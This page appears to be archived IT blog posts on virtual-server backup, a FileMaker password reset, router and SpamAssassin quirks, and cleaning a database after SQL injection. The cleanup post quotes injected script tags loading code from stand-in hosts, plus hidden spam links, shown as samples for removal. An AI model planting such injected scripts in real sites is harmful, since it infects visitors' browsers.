Back Up Microsoft Virtual Server Images…

Management, Productivity, Tips
Posted by Jeff Knapp

This article first appeared at the now-closed Win32Scripting site. Since I find it useful, and my bookmark no longer works, I have been unable to reach its author, Jeff Trumbull, so I hope he doesn't mind that I've archived it.

Author: Jeff Trumbull

Description:
Back up the files that make up a Microsoft virtual server with only about 1 minute of downtime. Suspends the virtual server, takes a shadow copy, starts the virtual server, then copies the virtual server files. This could be used to copy any open files. Requires vshadow.exe from the VSS SDK.

Script:

On Error Resume Next

' WshShell.Run window style: 7 = minimized, the current window stays active
Const WINDOW_MINIMIZED = 7

Set objShell = CreateObject("WScript.Shell")
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set virtualServer = CreateObject("VirtualServer.Application")
' Backup destination; must end with a backslash because file names are appended to it
DestBackupDir = "your backup path"
sExCmd = "CreateVSS.cmd"
Set oFileSys = CreateObject("Scripting.FileSystemObject")
If oFileSys.FileExists(sExCmd) Then oFileSys.DeleteFile(sExCmd)
' Second argument True = overwrite an existing file
Set oExCmd = oFileSys.CreateTextFile(sExCmd, True)

For Each objVM In virtualServer.VirtualMachines
     'See if vm machine is running (state 5). If so then do backup
     If objVM.State = 5 Then
          'Save state the virtual machine
          Set saveTask = objVM.Save
          'Loop waiting for task completion
          While Not saveTask.isComplete
               WScript.Sleep 1000
          Wend
          'Copy .VMC and .VSV files
          MyArray = Split(objVM.File, "\")
          Filename = MyArray(UBound(MyArray))
          objFSO.CopyFile objVM.File, DestBackupDir & Filename
          MyArray = Split(objVM.SavedStateFilePath, "\")
          Filename = MyArray(UBound(MyArray))
          objFSO.CopyFile objVM.SavedStateFilePath, DestBackupDir & Filename
     End If
Next
Set objVM = Nothing

' Create Shadow copy of VM drive (d:) and expose it as drive x:
oExCmd.WriteLine "vshadow.exe -script=setvar1.cmd -p d:"
oExCmd.WriteLine "call setvar1.cmd"
oExCmd.WriteLine "vshadow.exe -el=%SHADOW_ID_1%,x:"
oExCmd.Close
Result = objShell.Run(sExCmd, WINDOW_MINIMIZED, True)

' Start VM machine up from saved state
For Each objVM In virtualServer.VirtualMachines
     'See if vm machine is Saved (state 2). If so then resume
     If objVM.State = 2 Then
          'Start virtual machine
          objVM.Startup
     End If
Next

Set objVM = Nothing
WScript.Sleep 10000

If Result = 0 Then
     'Loop through all vm machines
     For Each objVM In virtualServer.VirtualMachines
          'See if vm machine is running. If so copy shadow backup of vm disk drives
          If objVM.State = 5 Then
               'Copy virtual hard disks and undo disks
               For Each vhd In objVM.HardDiskConnections
                    MyArray = Split(vhd.undoHardDisk.file, "\")
                    Filename = MyArray(UBound(MyArray))
                    'Swap the drive letter for x (the exposed shadow copy)
                    SourceName = "x" & Right(vhd.undoHardDisk.file, Len(vhd.undoHardDisk.file) - 1)
                    WScript.Echo vhd.undoHardDisk.file
                    WScript.Echo SourceName
                    objFSO.CopyFile SourceName, DestBackupDir & Filename
                    MyArray = Split(vhd.HardDisk.file, "\")
                    Filename = MyArray(UBound(MyArray))
                    SourceName = "x" & Right(vhd.HardDisk.file, Len(vhd.HardDisk.file) - 1)
                    objFSO.CopyFile SourceName, DestBackupDir & Filename
               Next
          End If
     Next
End If

' Shutdown all shadow copy instances
' Note: vshadow -da deletes every shadow copy on the system, not only the one created above
If oFileSys.FileExists(sExCmd) Then oFileSys.DeleteFile(sExCmd)
Set oExCmd = oFileSys.CreateTextFile(sExCmd, True)
oExCmd.WriteLine "Echo y | vshadow.exe -da"
oExCmd.Close
Result = objShell.Run(sExCmd, WINDOW_MINIMIZED, True)

'Script ends
WScript.Echo "done"

Resetting the Admin Password in Filemaker Server 9 on Windows

Tips
Posted by Jeff Knapp

Long story short, you can't... at least not thru the interface. Instead, you need to totally blow out your configuration and reconfigure the server.

However, it's not as bad as it seems - there's not so much to configure that it should be too big of a hassle.

If you have console access, close your databases, and make note of your settings.

  • Stop the Filemaker Service.
  • Assuming a default installation, go to c:\program files\filemaker\filemaker server\admin\conf and delete the 4 XML files in there.
  • Restart the Filemaker Service
  • Reconnect to the Filemaker Console

It'll re-walk you thru the wizard to set up the server, and the first thing you do is set up a username and password. Your databases (again, assuming a default installation) will already be there, ready to go...

User Licensing Gotchas

Tips
Posted by Jeff Knapp

Got a call from a client today who was unable to get his laptop to connect to his wireless network.

The client has a standard Linksys WRT54G which is sitting behind a WatchGuard SOHO router.  (The WatchGuard predated my involvement with the client, and we determined it was easier to use the WRT54G as an access point rather than ripping out the WatchGuard...)

Upon inspection, the laptop WAS connecting to the wireless network, it just didn't have internet access.  Vista would show it had Internet connectivity, but it would then just go away.

Upgraded the WRT54G's firmware, same result.  Changed from WEP to WPA-2. Same result.

Reviewed the logs on the WatchGuard and saw "User count exceeded. Packet dropped."

A-HA!

The WatchGuard, unlike most consumer routers, has a user limit to it.  It keeps track of 10 IPs and when IP number 11 hits the routing table, it gets whacked with a big ole' DENY rule.

When I plugged the laptop into the WRT54G via ethernet cable, the IP address was one of the 10 in the routing table and packets were allowed to flow.  The IP address assigned to the wireless interface was not in the table and therefore blocked.

We couldn't figure out why the laptop stopped working.  The client mentioned the laptop stopped working when we put a new computer on the floor.  We did a quick count of all devices on the network and only came up with 7...

Just as I was leaving, one of the warehouse guys came in holding his iPhone asking "Did something happen to the wireless network?"

Of course, something had -- I hadn't changed the Linksys back to WEP after the WPA-2 experiment, and he lost his connection... and the mystery of the additional devices was solved.

So, the moral is two-fold -- look for user licensing restrictions where you least expect them, and someone else's handheld device from home sitting on your network might have a negative impact on your ability to get work done.

SpamAssassin has Y2K + 10 Bug

Tips
Posted by Jeff Knapp

Just a quick heads up: SpamAssassin (which we use for filtering here at Jephens) has a malformed filtering rule that considers 2010 to be "grossly in the future" and therefore not a valid date.

This might have been true in Y2K, but in 2010, we're not so gross.

If you use ESVA like we do, there's a simple enough fix which is outlined in the ESVA Forums.

Otherwise, you'll need to fix your local.cf rules or edit the 72_active.cf file.

Further details can be found at Mike Cardwell's blog: SpamAssassin 2010 bug.

Cleaning Up After a SQL Injection Attack, Part 2

Programming, Security
Posted by Jeff Knapp

Got a call today off our previous article in this series from Branden of Hot Media Group, Inc., a Chicago-based web application development, networking, and graphic design firm. He found himself with a database full of malware infections, but the characteristics of his attack didn't match what we had written about, so he called us up. We reviewed his symptoms and were able to tweak the code we provided previously to work with this new set of issues.

We weren't able to see how the site was attacked, nor did we worry about how the site would be steeled against future occurrence (always use stored procedures and/or parametrized queries, kids!) -- this was purely a cleanup job.

This is the code we had:

DECLARE @T VARCHAR(255),@C VARCHAR(255)

-- Pass 1: user tables ('u') with text (35), nvarchar (231) or varchar (167) columns
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
-- Prints the UPDATE statements for review rather than executing them.
-- The string to strip goes between the first pair of doubled quotes.
PRINT ('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+'],'''', '''')')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

-- Pass 2: ntext (99) columns, which must be cast before REPLACE can be used
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND b.xtype=99
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
PRINT ('UPDATE ['+@T+'] SET ['+@C+']=cast(replace(cast(['+@C+'] as nvarchar(4000)),'''','''') as ntext)')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

And that worked fine, but it had some shortcomings -- mostly it only stripped out a single bit of invasive code, and our new friend had quite a bit of code to deal with, so instead of the almost quaint looking malware code:

<script src="hxxp://evilsite.evl/b.js"></script>

We had this jumble of code in every ntext field in his database:

<script type='text/javascript' src='http://google-anallytics.bad/urchin.js'></script>
<div style='display:none;'><a href='http://tests4all.bad/1/'>journals on losing post-pregnancy weight</a>
<a href='http://tests4all.bad/2/'>personal trainer certification atlanta</a>
<a href='http://tests4all.bad/3/'>quit smoking water vapor rings</a>
<a href='http://tests4all.bad/4/'>eyes in the darkness</a>
<a href='http://tests4all.bad/5/'>cheated map on dota 6.54b</a>
<a href='http://tests4all.bad/6/'>occupations for bored teen boys</a>
<a href='http://tests4all.bad/7/'>cgw southeast partners ilp</a>
<a href='http://tests4all.bad/8/'>does iq tests accurately measure intelligence</a>
<a href='http://tests4all.bad/9/'>free total psychic reading</a>
<a href='http://tests4all.bad/10/'>minnesota past life regression</a>
<a href='http://tests4all.bad/11/'>date of abraham lincolns death</a>

After trying to figure out the best way to escape all the single quotes, Branden -- an accomplished ColdFusion developer -- suggests "why don't we just drop everything to the right of the <script> tag?"
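
One way to implement Branden's suggestion, as an added example that is not the code from the original post (whose continuation is not on this page): it keeps the same print-the-UPDATEs pattern as the script above, but cuts each value at the first <script instead of replacing one fixed string. It assumes SQL Server 2005 or later (for nvarchar(max) and the sys catalog views) and that no legitimate data contains <script; the cursor and variable names are made up for the example.

```sql
-- Added example (not from the original post): PRINT, do not execute, UPDATEs that
-- cut every text column at the first '<script'. Assumes SQL Server 2005+ and that
-- legitimate data never contains '<script'. Back up first; review the output.
SET NOCOUNT ON;
DECLARE @S sysname, @T sysname, @C sysname, @Type sysname,
        @Tbl nvarchar(520), @Col nvarchar(300), @Cut nvarchar(1000);

DECLARE Col_Cursor CURSOR LOCAL FAST_FORWARD FOR
    SELECT s.name, t.name, c.name, ty.name
    FROM sys.tables t
    JOIN sys.schemas s ON s.schema_id = t.schema_id
    JOIN sys.columns c ON c.object_id = t.object_id
    JOIN sys.types ty ON ty.user_type_id = c.system_type_id  -- base type name
    WHERE ty.name IN ('varchar', 'nvarchar', 'text', 'ntext')
      AND c.is_computed = 0;

OPEN Col_Cursor;
FETCH NEXT FROM Col_Cursor INTO @S, @T, @C, @Type;
WHILE @@FETCH_STATUS = 0
BEGIN
    SET @Tbl = QUOTENAME(@S) + '.' + QUOTENAME(@T);
    -- LEFT() and CHARINDEX() reject text/ntext, so operate on an nvarchar(max)
    -- copy; unlike a cast to nvarchar(4000), this does not truncate long values.
    SET @Col = CASE WHEN @Type IN ('text', 'ntext')
                    THEN 'CAST(' + QUOTENAME(@C) + ' AS nvarchar(max))'
                    ELSE QUOTENAME(@C) END;
    SET @Cut = 'LEFT(' + @Col + ', CHARINDEX(''<script'', ' + @Col + ') - 1)';
    IF @Type IN ('text', 'ntext')
        SET @Cut = 'CAST(' + @Cut + ' AS ' + @Type + ')';

    -- Only rows that actually contain the marker are touched.
    PRINT 'UPDATE ' + @Tbl + ' SET ' + QUOTENAME(@C) + ' = ' + @Cut
        + ' WHERE CHARINDEX(''<script'', ' + @Col + ') > 0;';

    FETCH NEXT FROM Col_Cursor INTO @S, @T, @C, @Type;
END
CLOSE Col_Cursor;
DEALLOCATE Col_Cursor;
```

Run the printed statements inside a transaction and compare row counts before committing; QUOTENAME keeps table or column names containing brackets from breaking the generated SQL.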